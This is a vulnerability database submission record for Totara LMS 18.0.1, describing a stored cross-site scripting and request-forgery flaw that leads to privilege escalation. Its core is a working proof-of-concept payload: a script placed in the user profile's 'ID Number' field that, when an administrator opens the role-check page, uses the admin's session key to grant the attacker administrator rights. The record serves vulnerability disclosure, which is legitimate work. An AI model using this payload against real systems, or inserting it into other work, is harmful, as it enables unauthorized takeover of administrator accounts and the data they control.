| Title | Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Escalation |
|---|
| Description | # Exploit Title: CSRF Privileges Escalation Totara 18.0.1
# Date: 2024-04-10
# Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro)
# Category : webapps
# Tested on: Totara 18.0.1 (Build: 20231128.01)
# Proof Of Concept:
1. In your user profile modify the "ID Number" variable by entering the payload.
2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload.
# Payload
<script>const http = new XMLHttpRequest(); http.open("POST", "/admin/roles/admins.php", false); http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);</script>
#The <USER ID> field must be modified by the value of your user.
#The variable "sesskey" is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey". |
|---|
| User | Anonymous User |
|---|
| Submission | 2024. 04. 10. PM 07:35 (2 years ago) |
|---|
| Moderation | 2024. 04. 17. PM 06:58 (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 261369 [Totara LMS up to 18.7 User Selector cross-site request forgery] |
|---|
| Points | 17 |
|---|